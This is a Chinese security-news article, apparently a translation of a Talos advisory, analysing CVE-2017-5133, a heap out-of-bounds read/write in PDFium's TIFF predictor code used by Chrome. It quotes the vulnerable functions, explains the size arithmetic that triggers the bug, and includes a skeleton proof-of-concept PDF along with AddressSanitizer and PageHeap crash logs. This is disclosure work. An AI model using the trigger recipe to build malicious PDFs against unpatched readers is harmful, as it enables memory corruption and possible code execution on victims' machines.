freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Google PDFium TIFF Image Flate解码器代码执行漏洞分析(CVE-2017...
2017-10-28 15:00:22

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

CVE编号:

CVE-2017-5133

概要

由Chrome浏览器使用的包含60.0.3112.101的Pdfium的TIFF图像解码器功能中的堆漏洞存在一个读取/写入漏洞。特制的PDF文件可以在堆上触发逐个读写,导致内存损坏,可能的信息泄漏和潜在的代码执行。受害者需要在浏览器中打开恶意PDF,以触发此漏洞。

测试版本

Google Chrome 60.0.3112.101

产品网址

https://pdfium.googlesource.com

CVSSv3得分

7.5 - CVSS:3.0 / AV:N / AC:H / PR:N / UI:R / S:U / C:H / I:H / A:H

细节

Pdfium是由Google开发的开源PDF渲染器,广泛用于Chrome浏览器,在线服务以及其他独立应用程序。这个错误是在最新的git版本以及最新的铬地址清洁剂版本(asan-linux-release-498039)上进行的。

负责解码压缩TIFF图像流的代码中存在堆缓冲区溢出。在解析flate解码图像流的像素数据时,到达TIFF_PredictLine函数:

void TIFF\_PredictLine(uint8_t* dest_buf,
                   uint32_t row_size,
                   int BitsPerComponent,
                   int Colors,
                   int Columns) {

int BytesPerPixel = BitsPerComponent * Colors / 8;
 if (BitsPerComponent == 16) {
 for (uint32_t i = BytesPerPixel; i < row_size; i += 2) {
   uint16_t pixel =
       (dest_buf[i - BytesPerPixel] << 8) | dest_buf[i - BytesPerPixel + 1];
   pixel += (dest_buf[i] << 8) | dest_buf[i + 1];
   dest_buf[i] = pixel >> 8;
   dest_buf[i + 1] = (uint8_t)pixel;

在上述代码中,在for循环期间,dest_buffer里即使缓冲区的长度小于该长度,也始终会读取4个字节。这可能潜在地导致堆上的逐个读取,紧接着是逐个写入。为了实现错误代码并触发的脆弱状态,需要满足几个条件。在上一个函数中TIFF_Predictor,我们看到:

bool TIFF_Predictor(uint8_t*& data_buf,
                  uint32_t& data_size,
                  int Colors,
                  int BitsPerComponent,
                  int Columns) {
int row_size = (Colors * BitsPerComponent * Columns + 7) / 8;                         [1]
if (row_size == 0)
  return false;
const int row_count = (data_size + row_size - 1) / row_size;
const int last_row_size = data_size % row_size;                                        [2]
for (int row = 0; row < row_count; row++) {
  uint8_t* scan_line = data_buf + row * row_size;
  if ((row + 1) * row_size > (int)data_size) {
    row_size = last_row_size;                                                        [3]
  }
  TIFF_PredictLine(scan_line, row_size, BitsPerComponent, Colors, Columns);        [4]
}
return true;

在[1],row_size被计算并且是8的倍数。在[2],计算最后一行的数据大小,因为输入数据可能没有row_size可用的字节数。当最后一行被使用时(如果下一行最终在数据大小之外)row_size设置为last_row_size[3]。在[4]中,TIFF_PredictLine使用计算的行大小last_row_size调用易受攻击的功能。如果我们正确排列缓冲区大小,这可能导致最后 row_size为3,其中Tiff_PredictLine实际从数据缓冲区读取/写入4个字节,导致逐个读/写。
触发此错误的示例PDF是:

%PDF-1.6

47 0 obj
<</DecodeParms
      <<        /Columns 2
      /Colors 1
              /BitsPerComponent 16
              /Predictor 2>>
      /Filter/FlateDecode
      /W[0 0 0]>>
stream
...
endstream
endobj
startxref 30
%%EOF

上面的数据流内容只需要满足一个条件,也就是说,它必须解码为在前面提到的代码中在[2]的计算中导致3的长度。满足这些和一些前面提到的条件的最低长度为23的值Columns,Colors和未压缩的数据流长度可以调节,以控制缓冲区,字节访问和所有最终得到传递给其相应的值到我们提到的功能。根据底层分配器和其他变量,滥用此漏洞或内存覆盖的错误可能不可行,但可能会与其他漏洞组合,从而导致进一步的内存损坏。崩溃信息从当时的(asan-linux-release-498039)

Rendering PDF file poc_test.pdf.

=================================================================

==67198==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000003177 at pc 0x0000025b0826 bp    
0x7fffffffcf70 sp 0x7fffffffcf68
READ of size 1 at 0x603000003177 thread T0
  #0 0x25b0825 in _ZN12_GLOBAL__N_116TIFF_PredictLineEPhjiii 
./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:478
  #1 0x25b0825 in ?? ??:0
  #2 0x25b2646 in TIFF_Predictor ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:504
  #3 0x25b2646 in FlateOrLZWDecode ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:805
  #4 0x25b2646 in ?? ??:0
  #5 0x2423440 in _Z24FPDFAPI_FlateOrLZWDecodebPKhjP15CPDF_DictionaryjPPhPj 
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/fpdf_parser_decode.cpp:319
  #6 0x2423440 in ?? ??:0
  #7 0x24240a9 in _Z14PDF_DataDecodePKhjPK15CPDF_DictionaryjbPPhPjP14CFX_ByteStringPPS1_ crtstuff.c:?
  #8 0x24240a9 in ?? ??:0
  #9 0x2412602 in _ZN14CPDF_StreamAcc11LoadAllDataEbjb        
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_stream_acc.cpp:45
  #10 0x2412602 in ?? ??:0
  #11 0x23faa1b in _ZN11CPDF_Parser14LoadCrossRefV5EPlb   
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:1085
  #12 0x23faa1b in ?? ??:0
  #13 0x23ed71a in _ZN11CPDF_Parser17LoadAllCrossRefV5El 
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:645
  #14 0x23ed71a in ?? ??:0
  #15 0x23eaf90 in _ZN11CPDF_Parser18StartParseInternalEP13CPDF_Document 
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:248
  #16 0x23eaf90 in ?? ??:0
  #17 0x20f747b in _ZN12_GLOBAL__N_116LoadDocumentImplERK13CFX_RetainPtrI22IFX_SeekableReadStreamEPKc 
./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:288
  #18 0x20f747b in ?? ??:0
  #19 0x20f7734 in FPDF_LoadCustomDocument ./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:629
  #20 0x20f7734 in ?? ??:0
  #21 0x4f64b0 in
  ZB12_GLOBAL__N_19RenderPdfERKNSt3__112basic_stringIcNS0_11char_traitslcEENS0_9allocatorlcEEEEPKcmRKNS_7Options
  ES8_ ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1406
  #22 0x4f64b0 in ?? ??:0
  #23 0x4f3b7f in main ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1624
  #24 0x4f3b7f in ?? ??:0
  #25 0x7ffff624e82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
  #26 0x7ffff624e82f in ?? ??:0


  0x603000003177 is located 0 bytes to the right of 23-byte region [0x603000003160,0x603000003177)
  allocated by thread T0 here:
  #0 0x4c48e3 in __interceptor_malloc ??:?
  #1 0x4c48e3 in ?? ??:0
  #2 0x25b2106 in PartitionAllocGenericFlags 

./out/Release/../../third_party/pdfium/third_party/base/allocator/partition_allocator/partition_alloc.h:787
  #3 0x25b2106 in FX_SafeAlloc ./out/Release/../../third_party/pdfium/core/fxcrt/fx_memory.h:46
  #4 0x25b2106 in FX_AllocOrDie ./out/Release/../../third_party/pdfium/core/fxcrt/fx_memory.h:67
  #5 0x25b2106 in FlateUncompress ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:556
  #6 0x25b2106 in FlateOrLZWDecode ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:794
  #7 0x25b2106 in ?? ??:0
  #8 0x2423440 in _Z24FPDFAPI_FlateOrLZWDecodebPKhjP15CPDF_DictionaryjPPhPj     
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/fpdf_parser_decode.cpp:319
  #9 0x2423440 in ?? ??:0
  #10 0x24240a9 in _Z14PDF_DataDecodePKhjPK15CPDF_DictionaryjbPPhPjP14CFX_ByteStringPPS1_ crtstuff.c:?
  #11 0x24240a9 in ?? ??:0
  #12 0x2412602 in _ZN14CPDF_StreamAcc11LoadAllDataEbjb 
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_stream_acc.cpp:45
  #13 0x2412602 in ?? ??:0
  #14 0x23faa1b in _ZN11CPDF_Parser14LoadCrossRefV5EPlb 
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:1085
  #15 0x23faa1b in ?? ??:0
  #16 0x23ed71a in _ZN11CPDF_Parser17LoadAllCrossRefV5El 
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:645
  #17 0x23ed71a in ?? ??:0
  #18 0x23eaf90 in _ZN11CPDF_Parser18StartParseInternalEP13CPDF_Document 
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:248
  #19 0x23eaf90 in ?? ??:0
  #20 0x20f747b in _ZN12_GLOBAL__N_116LoadDocumentImplERK13CFX_RetainPtrI22IFX_SeekableReadStreamEPKc 
./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:288
  #21 0x20f747b in ?? ??:0
  #22 0x20f7734 in FPDF_LoadCustomDocument ./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:629
  #23 0x20f7734 in ?? ??:0
  #24 0x4f64b0 in
 ZN12_GLOBAL_N_19RenderPdfERKNSt3__112basic_stringIcNS0_11char_traitsIcEENS0_9allocatorIcEEEEPKcmRKNS_7OptionsE   
 S8_ ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1406
  #25 0x4f64b0 in ?? ??:0
  #26 0x4f3b7f in main ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1624
  #27 0x4f3b7f in ?? ??:0
  #28 0x7ffff624e82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
  #29 0x7ffff624e82f in ?? ??:0


SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/pdfium/repo/asan-linux-release-  
498039/pdfium_test+0x25b0825)
Shadow bytes around the buggy address:
0x0c067fff85d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff85e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff85f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8600: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x0c067fff8610: fd fd fa fa fd fd fd fa fa fa fd fd fd fa fa fa
=>0x0c067fff8620: fd fd fd fa fa fa fd fd fd fa fa fa 00 00[07]fa
0x0c067fff8630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable:           00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone:       fa
Freed heap region:       fd
Stack left redzone:      f1
Stack mid redzone:       f2
Stack right redzone:     f3
Stack after return:      f5
Stack use after scope:   f8
Global redzone:          f9
Global init order:       f6
Poisoned by user:        f7
Container overflow:      fc
Array cookie:            ac
Intra object redzone:    bb
ASan internal:           fe
Left alloca redzone:     ca
Right alloca redzone:    cb
==67198==ABORTING

   官方最新版本的Chrome在Windows上运行时启用了PageHeap(BugId的输出):

   BugId:            OOBW[0x1FB]+0~1#b6d7 c40.313 
Location: chrome.exe!verifier.dll!AVrfpDphCheckPageHeapBlock
Description: Page heap detected heap corruption at 0x8EA7FFB; at the end of a 507/0x1FB bytes heap block at 0x8EA7E00. This appears to be a classic
buffer-overrun vulnerability. The following byte values were written to the corrupted area: 22.
Version: chrome.exe: 60.0.3112.113 (x86)
verifier.dll: 6.1.7600.16385 (x86)
Security impact: Potentially highly exploitable security issue.
Integrity level: 0x2000 (Medium Integrity; this process appears to not be sandboxed!)
Arguments: ['--enable-experimental-accessibility-features', '--enable-experimental-canvas-features', '--enable-experimental-input-
view-features', '--
enable-experimental-web-platform-features', '--enable-logging=stderr', '--enable-usermedia-screen-capturing', '--enable-viewport', '--
enable-webgl-draft-
extensions', '--enable-webvr', '--expose-internals-for-testing', '--disable-popup-blocking', '--disable-prompt-on-repost', '--force-
renderer-
accessibility',
'--javascript-harmony', '--js-flags="--expose-gc"', '--no-sandbox', 'c:\\Users\\ea\\Desktop\\poc.pdf']
堆栈:
verifier.dll!VerifierStopMessage + 0x1F8 (this frame is irrelevant to this bug)
2.verifier.dll!AVrfpDphReportCorruptedBlock + 0x1C2 (this frame is irrelevant to this bug)
3.verifier.dll!AVrfpDphCheckPageHeapBlock + 0x161 (id: c40)
4.verifier.dll!AVrfpDphFindBusyMemory + 0xDA (id: 313)
5.verifier.dll!AVrfpDphFindBusyMemoryAndRemoveFromBusyList + 0x20
6.ntdll.dll!RtlpDebugPageHeapFree + ? (the exact offset is not known)
7.ntdll.dll!RtlDebugFreeHeap + 0x2F
8.ntdll.dll!RtlpFreeHeap + 0x5D
9.ntdll.dll!RtlFreeHeap + 0x142
10.kernel32.dll!HeapFree + 0x14
11.chrome_child.dll + 0x163239 (no function symbol available)
12.chrome_child.dll + 0x1852FAA (no function symbol available)
13.chrome_child.dll + 0x184DDD1 (no function symbol available)
14.chrome_child.dll + 0x1846493 (no function symbol available)
15.chrome_child.dll + 0x18488BD (no function symbol available)
16.chrome_child.dll + 0x18485B5 (no function symbol available)
17.chrome_child.dll + 0x1823308 (no function symbol available)
18.chrome_child.dll + 0x18175AB (no function symbol available)
19.chrome_child.dll + 0x181413D (no function symbol available)
20.chrome_child.dll + 0x181468D (no function symbol available)
21.chrome_child.dll + 0x181F15A (no function symbol available)
22.chrome_child.dll + 0x181E1AF (no function symbol available)
23.chrome_child.dll + 0x17CA70A (no function symbol available)
24.chrome_child.dll + 0x1437254 (no function symbol available)
25.chrome_child.dll + 0x143797E (no function symbol available)
26.chrome_child.dll + 0x16729C1 (no function symbol available)

Page heap output for heap block near 0x8EA7FFB
address 08ea7e00 found in
_DPH_HEAP_ROOT @ 4161000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
8712000: 8ea7e00 1fb - 8ea7000 2000
6ccf8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77876206 ntdll!RtlDebugAllocateHeap+0x00000030
7783a127 ntdll!RtlpAllocateHeap+0x000000c4
77805950 ntdll!RtlAllocateHeap+0x0000023a
58de52c3 chrome_child!ovly_debug_event+0x0014dff3
5a357dd2 chrome_child!IsSandboxedProcess+0x003fb31f
5a3cf306 chrome_child!IsSandboxedProcess+0x00472853
5a379bca chrome_child!IsSandboxedProcess+0x0041d117
5a37a05d chrome_child!IsSandboxedProcess+0x0041d5aa
5a38311c chrome_child!IsSandboxedProcess+0x00426669
5a376b0e chrome_child!IsSandboxedProcess+0x0041a05b
5a376493 chrome_child!IsSandboxedProcess+0x004199e0
5a3788bd chrome_child!IsSandboxedProcess+0x0041be0a
5a3785b5 chrome_child!IsSandboxedProcess+0x0041bb02
5a353308 chrome_child!IsSandboxedProcess+0x003f6855
5a3475ab chrome_child!IsSandboxedProcess+0x003eaaf8
5a34413d chrome_child!IsSandboxedProcess+0x003e768a
5a34468d chrome_child!IsSandboxedProcess+0x003e7bda
5a34f15a chrome_child!IsSandboxedProcess+0x003f26a7
5a34e1af chrome_child!IsSandboxedProcess+0x003f16fc
5a2fa70a chrome_child!IsSandboxedProcess+0x0039dc57
59f67254 chrome_child!IsSandboxedProcess+0x0000a7a1
59f6797e chrome_child!IsSandboxedProcess+0x0000aecb
5a1a29c1 chrome_child!IsSandboxedProcess+0x00245f0e
5a1a2be2 chrome_child!IsSandboxedProcess+0x0024612f
5a17e7ea chrome_child!IsSandboxedProcess+0x00221d37
5a17e9fb chrome_child!IsSandboxedProcess+0x00221f48
58c33f7e chrome_child+0x00103f7e
58c31129 chrome_child+0x00101129
58c33bc4 chrome_child+0x00103bc4
58c996e8 chrome_child!ovly_debug_event+0x00002418
58f54b95 chrome_child!ChromeMain+0x0000b501                              

时间线

2017-09-05 - 供应商披露
2017-10-19 - 公开发布

参考来源:https://www.talosintelligence.com/reports/TALOS-2017-0432

*本文作者:生如夏花,转载请注明来自 FreeBuf.COM

本文作者:, 转载请注明来自FreeBuf.COM

# google # PDFium TIFF Image Flate
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦
收入专辑